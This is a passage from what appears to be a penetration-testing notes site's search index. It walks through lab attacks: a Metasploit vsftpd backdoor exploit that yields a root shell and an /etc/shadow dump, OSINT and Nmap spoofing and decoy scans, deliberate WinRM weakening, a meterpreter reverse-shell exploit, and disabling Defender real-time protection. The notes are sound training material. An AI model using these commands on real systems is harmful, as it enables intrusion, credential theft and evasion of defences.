\u0026gt; use exploit/unix/ftp/vsftpd_234_backdoor \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003eunix/ftp/vsftpd_234_backdoor\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e payload cmd/unix/interact \n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003eunix/ftp/vsftpd_234_backdoor\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 172.30.1.20 msf6 exploit\u003cspan class=\"o\"\u003e(\u003c/span\u003eunix/ftp/vsftpd_234_backdoor\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; exploit\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"le_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_3.png\"\u003e\n6. Upgrade the shell using the command \u003ccode\u003epython -c 'import pty; pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\u003c/code\u003e\n\u003cimg alt=\"le_4\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_4.png\"\u003e\n7. Got a root shell on the target system, dumped the \u003ccode\u003e/etc/shadow\u003c/code\u003e file where the hashes of the users\u0026rsquo; passwords are stored.\n\u003cimg alt=\"le_5\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_5.png\"\u003e\n8. 
Save the credentials into a text file; make sure to remove the unnecessary users from the output:\n\u003cimg alt=\"le_6\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/05/le_6.png\"\u003e\u003c/p\u003e","title":"Identifying and Exploiting Vulnerable Services"},{"content":"\nCommands: Let\u0026rsquo;s gather the names of employees who work, or worked, at Microsoft and have a LinkedIn profile by using the following command: kali@kali  ~  theHarvester -d microsoft.com --dns-server 8.8.8.8 -b linkedin -d = : Specifies the target organization by using the domain name. --dns-server = : This allows you to specify a DNS server for all DNS queries. -b = Specifies the source to retrieve the information Sub-domain searching: kali@kali  ~  theHarvester -d microsoft.com -b bing ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/05-the-harvester/","summary":"\u003cp\u003e\u003cimg alt=\"th_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/05/th_1.png\"\u003e\u003c/p\u003e\n\u003ch2 id=\"commands\"\u003eCommands:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003elet\u0026rsquo;s gather the names of employees who work, or worked, at Microsoft and have a LinkedIn profile by using the following command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e kali@kali  ~  theHarvester -d microsoft.com --dns-server 8.8.8.8 -b linkedin\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e-d\u003c/code\u003e = : Specifies the target organization by using the domain name.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e--dns-server\u003c/code\u003e = : This allows you to specify a DNS server for all DNS queries.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e-b\u003c/code\u003e = 
Specifies the source to retrieve the information\u003c/li\u003e\n\u003c/ul\u003e\n\u003col start=\"2\"\u003e\n\u003cli\u003eSub-domain searching:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e kali@kali  ~  theHarvester -d microsoft.com -b bing \n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"th_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/05/th_2.png\"\u003e\u003c/p\u003e","title":"TheHarvester"},{"content":"COMING SOON\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/08-post-exploitation-techniques/06-bgp-hijack/","summary":"\u003cp\u003e\u003cem\u003eCOMING SOON\u003c/em\u003e\u003c/p\u003e","title":"BGP Hijacking"},{"content":"Employees of an organization often leak too much information about themselves and their company. While many employees are very happy to be working in their organizations, sometimes, they share information that can be used during cyberattacks by a threat actor. As an aspiring penetration tester, this information can also be leveraged during a penetration test on the target organization.\nThe following is some information that\u0026rsquo;s commonly leaked:\nEmployee contact information, such as telephone numbers and email addresses, that can be used during social engineering and account takeover attacks. Sharing photos with their employee badges, which can be used by a threat actor to create a fake ID for impersonation. Pictures of an employee\u0026rsquo;s computing systems and desktop, which can inform a threat actor about the available device vendors and operating systems. Projects that have been completed by the employee may contain specific technical details, which can allow a threat actor to profile the internal network infrastructure. 
Gathering information from Instagram: Using sherlock. The --timeout option ensures that sherlock doesn\u0026rsquo;t spend more than 5 seconds on a site. Gathering company\u0026rsquo;s infra data: we can use tools like wappalyzer to see what kind of tech a target website is using: We can also utilize a website called built-with for getting the technology profile of a target website. Shodan: Shodan is a search engine for Internet of Things (IoT), systems, and networks that are directly connected to the internet. Ethical hackers, penetration testers, and even threat actors use Shodan to identify their organization\u0026rsquo;s or target\u0026rsquo;s assets, and they check whether they have been publicly exposed on the internet.\nGo to https://www.shodan.io Make an account and log in first. Once logged in, search for windows server 2008 Then click one of the results; this will provide additional information: Some port numbers for identification: Port 21: There\u0026rsquo;s a File Transfer Protocol (FTP) server. Port 53: This system is providing Domain Name System (DNS) services. Port 80: There\u0026rsquo;s a web server on this device. Port 110: This device is providing Post Office Protocol 3 (POP3) services for email clients. Port 143: This system is running Internet Message Access Protocol 4 (IMAP4) services for email clients. Port 3389: Microsoft Remote Desktop Protocol (RDP) operates on this port by default, which means RDP is currently active. Port 8181: Provides email services over this port. Tip: Sometimes Shodan provides CVE (Common Vulnerabilities and Exposures) identifiers for particular internet-connected machines, which can be very helpful for penetration testers.\nCensys: Censys can gather intelligence on any publicly accessible system or network on the internet. 
To start gathering data about a target follow these steps:\nRegister on https://search.censys.io Then login Search for any query you need : I went to one of the machines and this provides me additional information : Maltego: Maltego is a graphical open source intelligence tool that was created by Paterva and is now maintained by Maltego Technologies. This tool helps ethical hackers and penetration testers quickly gather an organization\u0026rsquo;s infrastructure data by using a graphical interactive data mining application. This application can query and gather information from various sources on the internet and present data in easy-to-read graphs. These graphs provide visualizations of the relationships between each entity and the target.\nSign in to https://maltego.com Complete the whole form, after completion come to the kali desktop. Then search for maltego From the installer install maltego Then again search for maltego on the kali search bar, and open it. Your maltego setup wizard will open up. Log in with your maltego ID you setup onto the browser. After the setup, click on New button on the left corner: Entity palette: Onto the search bar search for Domain and drag and drop the Domain entity inside the graph: Double click on the dragged Domain entity and set your target domain name : To gather the Domain Name System (DNS) information about the domain, right-click on Domain entity and select DNS from Domain \u0026gt; To DNS Name – MX (mail server). Now maltego will find microsoft\u0026rsquo;s email server. To get the IP addresses of an object, such as the email server, right-click on the email server entity and select Resolve to IP. To discover the Name Server (NS) of a target domain, right-click on Domain Entity \u0026gt; DNS from domain \u0026gt; To DNS Name – NS (name server). To gather website information about the target domain, right-click on the Domain entity and select DNS from domain \u0026gt; To Website (Quick lookup). 
This will allow you to discover the target\u0026rsquo;s website address. To get a list of all the web links for the target\u0026rsquo;s website, right-click on the Website entity and select Links in and out of site. To get a list of publicly available email addresses that are associated with the target\u0026rsquo;s domain name, right-click on the Domain entity and select Email addresses from Domain. DONE Netcraft: Netcraft allows you to gather information about a target domain, such as network block information, registrar information, email contacts, the operating system of the hosting server, and the web platform.\nGo to https://searchdns.netcraft.com Search for the DNS you need. Click one of those onto the site report: More reading on OSINT: OSINT\nOSINT using perl: COMING SOON\nGoogle dorks: A list of well-known exploited Google dorks for information gathering can be found in a Google hacker\u0026rsquo;s database at http://www.exploit-db.com/google-dorks/.\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/02-reconnaissance/06-social-media-recon/","summary":"\u003cp\u003eEmployees of an organization often leak too much information about themselves and their company. While many employees are very happy to be working in their organizations, sometimes, they share information that can be used during cyberattacks by a threat actor. 
As an aspiring penetration tester, this information can also be leveraged during a penetration test on the target organization.\u003c/p\u003e\n\u003cp\u003eThe following is some information that\u0026rsquo;s commonly leaked:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEmployee contact information, such as telephone numbers and email addresses, that can be used during social engineering and account takeover attacks.\u003c/li\u003e\n\u003cli\u003eSharing photos with their employee badges, which can be used by a threat actor to create a fake ID for impersonation.\u003c/li\u003e\n\u003cli\u003ePictures of an employee\u0026rsquo;s computing systems and desktop, which can inform a threat actor about the available device vendors and operating systems.\u003c/li\u003e\n\u003cli\u003eProjects that have been completed by the employee may contain specific technical details, which can allow a threat actor to profile the internal network infrastructure.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"gathering-information-from-instagram\"\u003eGathering information from instagram:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUsing \u003ccode\u003esherlock\u003c/code\u003e \u003cimg alt=\"scm_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/06/scm_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e--timeout \u003c/code\u003e command ensures that \u003ccode\u003esherlock\u003c/code\u003e doesn\u0026rsquo;t spend more than 5 seconds on a site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003chr\u003e\n\u003ch2 id=\"gathering-companys-infra-data\"\u003eGathering company\u0026rsquo;s infra data:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003ewe can use tools like \u003ccode\u003ewappalyzer\u003c/code\u003e to see what kind of tech a target website is using:\n\u003cimg alt=\"scm_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/06/scm_2.png\"\u003e\u003c/li\u003e\n\u003cli\u003eWe can also utilize a website called \u003ca 
href=\"https://builtwith.com\"\u003ebuilt-with\u003c/a\u003e for getting the technology profile of a target website.\n\u003cimg alt=\"scm_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/recon/06/scm_3.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"shodan\"\u003eShodan:\u003c/h2\u003e\n\u003cp\u003eShodan is a search engine for Internet of Things (IoT), systems, and networks that are directly connected to the internet. Ethical hackers, penetration testers, and even threat actors use Shodan to identify their organization\u0026rsquo;s or target\u0026rsquo;s assets, and they check whether they have been publicly exposed on the internet.\u003c/p\u003e","title":"Social Media Recon (SOCMINT)"},{"content":" Nmap supports both MAC and IP address spoofing; follow the command. nmap -Pn --spoof-mac Dell target_ip I captured the live packets using wireshark; it actually spoofed the MAC address to DELL\u0026rsquo;S MAC address: You can set the option --spoof-mac 0 to let Nmap choose the vendor itself. To spoof an IP address during a scan while using Nmap, use the -S option: sudo nmap -S spoofed_ip -e eth0 target_ip # sudo nmap -S 192.168.0.1 -e eth0 172.30.1.134 IP spoofing won\u0026rsquo;t work well: when the target tries to complete the three-way handshake, the TCP SYN-ACK reply goes to the spoofed IP, so we never receive a connection or scan results back.\nUse DECOY only for IPs: nmap -D DECOY_IP_1,DECOY_IP_2,ME,DECOY_IP_3 target_ip ME: nmap will insert our actual IP at this position among the decoys. Having completed this section, you have learned how to evade detection on a network while performing scanning using Nmap.\nPerforming a stealth scan: By default, Nmap establishes a TCP 3-way handshake on any open TCP ports found on the target systems. Once the handshake has been established between the attacker system and the target, data packets are exchanged between each host. 
To prevent Three way handshake , we can use nmap's stealth scan. A stealth scan does not establish a full TCP handshake with the target. The attacker machine tricks the target by sending a TCP SYN packet to a specific port on the target system to determine if the port is open. Then, the target system will respond with a TCP SYN/ACK packet if the port is open. Lastly, the attacker will send a TCP RST packet to the target to reset the connection state and terminate the connection. NMAP stealth scanning using filter -sS nmap -sS -p80 172.30.1.134 wireshark view of SYN -\u0026gt; SYN-ACK -\u0026gt; RST flow ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/06-spoofind-mac-and-ip-address/","summary":"\u003col\u003e\n\u003cli\u003eNMAP supports both \u003ccode\u003eMAC, IP\u003c/code\u003e address spoofing, follow the command.\n\u003cimg alt=\"ip_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/06/ip_1.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -Pn --spoof-mac Dell target_ip\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"ip_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/06/ip_2.png\"\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eI captured the live packet using \u003ccode\u003ewireshark\u003c/code\u003e it actually spoofed the \u003ccode\u003eMAC address\u003c/code\u003e to DELL\u0026rsquo;S MAC address:\n\u003cimg alt=\"ip_3\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/06/ip_3.png\"\u003e\u003c/li\u003e\n\u003cli\u003eyou can set the option \u003ccode\u003e--spoof-mac 0\u003c/code\u003e to let NMAP choose which vendor it wants to choose.\u003c/li\u003e\n\u003cli\u003eTo spoof an IP address during a scan while 
using Nmap, use the \u003ccode\u003e–S\u003c/code\u003e command:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo nmap -S spoofed_ip -e eth0 target_ip\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# sudo nmap -S 192.168.0.1 -e eth0 172.30.1.134\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cem\u003eIP spoofing won\u0026rsquo;t work well, as when the target will try to do Three-way-handshake the TCP SYN-ACK reply will go to the spoofed IP, we will never receive a connection/scan results back.\u003c/em\u003e\u003c/p\u003e","title":"Spoofing MAC \u0026 IP Address"},{"content":"It is not recommended to add local accounts into Domain Controllers, they should be on workstations only. Use your windows machines, not the server. Steps should be similar as this practical.\nBy default on windows server 2019 winRM comes enabled. We can verify through server manager as well as CLI , let\u0026rsquo;s verify: SERVER MANAGER: POWERSHELL: Default port for WINRM is 5985 # command netstat -ano | findstr \u0026#34;5985\u0026#34; The WinRM service starts automatically on Windows Server 2008, and later. On earlier versions of Windows (client or server), you need to start the service manually. winrm hardening: RESOURCE-BLOG\nBy default, no WinRM listener is configured. Even if the WinRM service is running, WS-Management protocol messages that request data can\u0026rsquo;t be received or sent. Internet Connection Firewall (ICF) blocks access to ports. 
COMMANDS:\nwinrm enumerate winrm/config/listener winrm get winrm/config winrm quickconfig # winrm qc (in short) winrm misconfigs for exploitation: COMMANDS:\nAllowing unencrypted http traffic: winrm set winrm/config/service \u0026#39;@{AllowUnencrypted=\u0026#34;true\u0026#34;}\u0026#39; 2. Enabling basic authentication on the server:\nwinrm set winrm/config/service/auth \u0026#39;@{Basic=\u0026#34;true\u0026#34;}\u0026#39; 3. Adding a local user sysadmin into the group of winrm 4. But first we need to create that group if it\u0026rsquo;s not been created automatically:\nnet localgroup \u0026#34;WinRMRemoteWMIUsers__\u0026#34; /add /comment:\u0026#34;Users authorized for remote WMI and WinRM.\u0026#34; then add the user\nnet localgroup \u0026#34;WinRMRemoteWMIUsers__\u0026#34; \u0026#34;TheUserName\u0026#34; /add 5. Now we need to configure that the group is having proper permissions and ACLs for remote connections, follow the steps:\nwinrm configSDDL default 6. To confirm the group is added type this command in cmd:\n(Get-PSSessionConfiguration -Name \u0026#34;Microsoft.PowerShell\u0026#34;).Permission IF THE GROUP ALREADY EXISTS, LIKE IN MY CASE IT IS, then follow the steps: net localgroup \u0026#34;Remote Management Users\u0026#34; \u0026#34;sysadmin\u0026#34; /add ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/06-winrm-configuration-on-win-server-2019/","summary":"\u003cp\u003e\u003cstrong\u003eIt is not recommended to add local accounts into Domain Controllers, they should be on workstations only. Use your windows machines, not the server. 
Steps should be similar as this practical.\u003c/strong\u003e\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eBy default on \u003ccode\u003ewindows server 2019\u003c/code\u003e \u003ccode\u003ewinRM\u003c/code\u003e comes enabled.\u003c/li\u003e\n\u003cli\u003eWe can verify through \u003ccode\u003eserver manager\u003c/code\u003e as well as \u003ccode\u003eCLI\u003c/code\u003e , let\u0026rsquo;s verify:\n\u003ccode\u003eSERVER MANAGER:\u003c/code\u003e\n\u003cimg alt=\"wr_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/06/wr_1.png\"\u003e\n\u003ccode\u003ePOWERSHELL:\u003c/code\u003e\n\u003cimg alt=\"wr_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/06/wr_2.png\"\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cul\u003e\n\u003cli\u003eDefault port for \u003ccode\u003eWINRM\u003c/code\u003e is \u003ccode\u003e5985\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c\"\u003e# command\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003enetstat\u003c/span\u003e \u003cspan class=\"n\"\u003e-ano\u003c/span\u003e \u003cspan class=\"p\"\u003e|\u003c/span\u003e \u003cspan class=\"n\"\u003efindstr\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;5985\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cul\u003e\n\u003cli\u003eThe WinRM service starts automatically on Windows Server 2008, and later. 
On earlier versions of Windows (client or server), you need to start the service manually.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"winrm-hardening\"\u003ewinrm hardening:\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://learn.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management\"\u003eRESOURCE-BLOG\u003c/a\u003e\u003c/p\u003e","title":"WinRM Configuration on Windows Server 2019"},{"content":"Scanning using metasploit: start the msfconsole sudo msfconsole search for portscan modules: msf\u0026gt; search portscan 3. Let\u0026rsquo;s use the 6th module and do the operation:\nuse 6 options set RHOSTS 172.30.1.134 # setting the targt_ip run Enumerating SMB using msfconsole: Server Message Block (SMB) is a network service that allows hosts to send resources such as files to other hosts on a network. As an aspiring ethical hacker and penetration tester, it\u0026rsquo;s always recommended to enumerate file shares once it\u0026rsquo;s within your scope for the penetration test.\nResults: Using more than one tool to enumerate services running on your target is always good because there\u0026rsquo;s the possibility one tool may miss something important, while the other tool may not.\nSince SMB has been discovered on our target system, we can use smbmap to enumerate the files and shared drives within the target. To get started with smbmap , open a new terminal and type the following command: smbmap -H 172.30.1.134 2. We can see that anyone can access the tmp share plus having read and write perms. 3. Let\u0026rsquo;s display the contents of that file share:\nsmbmap -H 172.30.1.134 -r tmp 4. To download the contents of a shared drive using SMBMap, use the following command:\nsmbmap -H 172.30.1.134 --download .\\tmp\\* --download : This option will ask for the path of downloading the contents. 
.\\tmp\\* : This is the file share we are going to download; \\* means everything inside the file share.\nEnumerating SSH using msfconsole: Secure Shell (SSH) is a common network protocol that\u0026rsquo;s found on many organizations\u0026rsquo; networks. It allows IT professionals to establish a secure, encrypted Terminal connection between their device and a remote server. Port 22 is the default port for ssh.\nWe will start off by enumerating the version of ssh that\u0026rsquo;s being used by the vulnerable machine. search ssh_version use auxiliary/scanner/ssh/ssh_version options set RHOSTS target_ip run FINDINGS FROM SSH ENUM: SSH version -\u0026gt; OpenSSH 4.7p1, OS version -\u0026gt; Debian8 ubuntu 1\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/04-active-information-gathering/07-enumerating-common-network-services/","summary":"\u003ch2 id=\"scanning-using-metasploit\"\u003eScanning using metasploit:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003estart the \u003ccode\u003emsfconsole\u003c/code\u003e\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo msfconsole\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003col start=\"2\"\u003e\n\u003cli\u003esearch for \u003ccode\u003eportscan\u003c/code\u003e modules:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf\u0026gt; search portscan\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"cn_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/07/cn_1.png\"\u003e\n3. 
Let\u0026rsquo;s use the 6th module and do the operation:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euse \u003cspan class=\"m\"\u003e6\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003eoptions\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 172.30.1.134 \u003cspan class=\"c1\"\u003e# setting the targt_ip\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003cimg alt=\"cn_2\" loading=\"lazy\" src=\"/images/Pentesting/NP/AIG/07/cn_2.png\"\u003e\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"enumerating-smb-using-msfconsole\"\u003eEnumerating SMB using msfconsole:\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eServer Message Block (SMB)\u003c/code\u003e is a network service that allows hosts to send resources such as files to other hosts on a network. As an aspiring ethical hacker and penetration tester, it\u0026rsquo;s always recommended to enumerate file shares once it\u0026rsquo;s within your scope for the penetration test.\u003c/p\u003e","title":"Enumerating Common Network Services"},{"content":" In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. 
Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems. exploitation: Open Kali for scanning and exploitation: Open up msfconsole for the exploitation part: sudo msfconsole use auxiliary/scanner/winrm/winrm_cmd msf auxiliary(scanner/winrm/winrm_cmd) \u0026gt; set RHOSTS 192.168.83.140 RHOSTS =\u0026gt; 192.168.83.140 msf auxiliary(scanner/winrm/winrm_cmd) \u0026gt; set USERNAME Administrator USERNAME =\u0026gt; Administrator msf auxiliary(scanner/winrm/winrm_cmd) \u0026gt; set PASSWORD P@ssword1 PASSWORD =\u0026gt; P@ssword1 By default the command that will be executed is ipconfig /all Remember the setup of the local user for winrm access, where we gave access to the user sysadmin; let\u0026rsquo;s try that: It actually worked. Now let\u0026rsquo;s try for a remote shell: msf6 \u0026gt; use exploit/windows/winrm/winrm_script_exec msf6 exploit(windows/winrm/winrm_script_exec) \u0026gt; set RHOSTS 192.168.83.140 msf6 exploit(windows/winrm/winrm_script_exec) \u0026gt; set LHOST 192.168.83.128 Also turn off real time protection on your windows server, because it will quarantine the execution. Use this command in powershell on your DC: Set-MpPreference -DisableRealtimeMonitoring $true 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. 4. 
For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let\u0026rsquo;s see the options:\nmsf exploit(windows/winrm/winrm_script_exec) \u0026gt; set DOMAIN REDTEAMLAB DOMAIN =\u0026gt; REDTEAMLAB msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set USERNAME Administrator USERNAME =\u0026gt; Administrator msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set PASSWORD Password123 PASSWORD =\u0026gt; Password123 msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set payload windows/x64/meterpreter/reverse_tcp payload =\u0026gt; windows/x64/meterpreter/reverse_tcp msf exploit(windows/winrm/winrm_script_exec) \u0026gt; set FORCE_VBS false FORCE_VBS =\u0026gt; false run the exploit: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/07-winrm-exploitation/","summary":"\u003cul\u003e\n\u003cli\u003eIn a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. 
Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"exploitation\"\u003eexploitation:\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eOpen kali for scanning and exploitation:\n\u003cimg alt=\"we_1\" loading=\"lazy\" src=\"/images/Pentesting/NP/NPP/07/we_1.png\"\u003e\u003c/li\u003e\n\u003cli\u003eOpen up \u003ccode\u003emsfconsole\u003c/code\u003e for exploitation part:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo msfconsole\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003euse auxiliary/scanner/winrm/winrm_cmd\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf auxiliary\u003cspan class=\"o\"\u003e(\u003c/span\u003escanner/winrm/winrm_cmd\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e RHOSTS 192.168.83.140\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nv\"\u003eRHOSTS\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e\u0026gt; 192.168.83.140\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003emsf auxiliary\u003cspan class=\"o\"\u003e(\u003c/span\u003escanner/winrm/winrm_cmd\u003cspan class=\"o\"\u003e)\u003c/span\u003e \u0026gt; \u003cspan class=\"nb\"\u003eset\u003c/span\u003e USERNAME Administrator\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"nv\"\u003eUSERNAME\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e\u0026gt; 
